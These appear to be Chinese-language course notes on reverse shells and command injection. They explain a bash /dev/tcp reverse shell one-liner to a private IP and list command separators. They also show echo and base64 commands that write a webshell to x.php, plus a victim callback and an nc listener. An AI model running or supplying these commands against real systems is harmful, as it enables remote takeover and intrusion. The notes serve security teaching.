课程内容
反弹shell命令解析
一个简单的反弹shell命令
1 | bash -i >& /dev/tcp/192.168.2.233/2333 0>&1 |
bash -i交互式执行bash
>&将输出和错误重定向
0>&1将输出重定向到输入
命令执行
原因
开发装未对用户输入做严格校验,将用户可控参数拼接到了命令执行函数中,导致恶意命令被执行
危害
恶意命令被执行
挖掘
黑盒
白盒
利用
拼接符
&&,||,&,|,;
写webshell
echo "webshell" > x.php
base64写webshell
echo base64_content | base64 -d > x.php
反弹shell
受害者
bash -i >& /dev/tcp/your_ip/23333 0>&1
监听主机
nc -lvnp 23333